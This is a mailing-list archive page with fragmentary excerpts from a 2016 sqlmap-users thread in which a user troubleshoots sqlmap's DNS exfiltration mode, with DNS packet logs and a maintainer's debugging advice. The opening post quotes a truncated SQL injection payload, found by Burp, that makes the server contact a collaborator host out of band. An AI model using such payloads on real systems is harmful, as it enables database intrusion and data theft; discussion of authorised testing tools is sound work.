subject:"\[sqlmap\-users\] Sqlmap\/DNS exfil"

Re: [sqlmap-users] Sqlmap/DNS exfil

2016-12-19 Thread Brandon Perry

>> 16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ ? >> www.testsite.org <http://www.testsite.org/>. (30) >> 16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A >> 173.213.231.200 (46) >> 16:58:04.079921 IP 8.8.8.8.53 > 97.8

Re: [sqlmap-users] Sqlmap/DNS exfil

2016-12-19 Thread Miroslav Stampar

7.91.210.56778: 15627 0/1/0 (117) >> 16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A? >> www.testsite.org. (30) >> 16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ ? >> www.testsite.org. (30) >> 16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/

Re: [sqlmap-users] Sqlmap/DNS exfil

2016-12-19 Thread Mark M .

.testsite.org>. (30) 16:59:09.104935 IP 8.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A 173.213.231.200 (46) 16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117) It doesn't seem like an injection pattern is being tried that is getting the DNS exfiltration to occur...

Re: [sqlmap-users] Sqlmap/DNS exfil

2016-12-19 Thread Miroslav Stampar

1/0/0 A >> 173.213.231.200 (46) >> 16:56:59.112534 IP 8.8.8.8.53 > 97.87.91.210.56778: 15627 0/1/0 (117) >> 16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A? >> www.testsite.org. (30) >> 16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ AAAA? >&

Re: [sqlmap-users] Sqlmap/DNS exfil

2016-12-19 Thread Miroslav Stampar

16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A > 173.213.231.200 (46) > 16:58:04.079921 IP 8.8.8.8.53 > 97.87.91.210.56624: 9755 0/1/0 (117) > 16:59:09.078601 IP 97.87.91.210.40911 > 8.8.8.8.53: 52733+ A? > www.testsite.org. (30) > 16:59:09.078623 IP 97.87

Re: [sqlmap-users] Sqlmap/DNS exfil

2016-12-19 Thread Mark M .

.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A 173.213.231.200 (46) 16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117) It doesn't seem like an injection pattern is being tried that is getting the DNS exfiltration to occur... or else I'm doing something else wrong. Thanks, V _

Re: [sqlmap-users] Sqlmap/DNS exfil

2016-12-19 Thread Miroslav Stampar

I would suggest you to run the wireshark or similar when running the --dns-domain to properly debug what is going on. There could be really lots of problems before you fine tune it (e.g. other service running on :53). About the "forcing" sqlmap for using dns-exfil. It will always at least try to t

[sqlmap-users] Sqlmap/DNS exfil

2016-12-19 Thread Mark M .

I have a situation where Burp has detected the following DNS exfiltration injection for a query parameter in a web app: GET //Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20ma

Re: [sqlmap-users] Sqlmap/DNS exfil

Re: [sqlmap-users] Sqlmap/DNS exfil

Re: [sqlmap-users] Sqlmap/DNS exfil

Re: [sqlmap-users] Sqlmap/DNS exfil

Re: [sqlmap-users] Sqlmap/DNS exfil

Re: [sqlmap-users] Sqlmap/DNS exfil

Re: [sqlmap-users] Sqlmap/DNS exfil

[sqlmap-users] Sqlmap/DNS exfil

8 matches

Site Navigation

Mail list logo

Footer information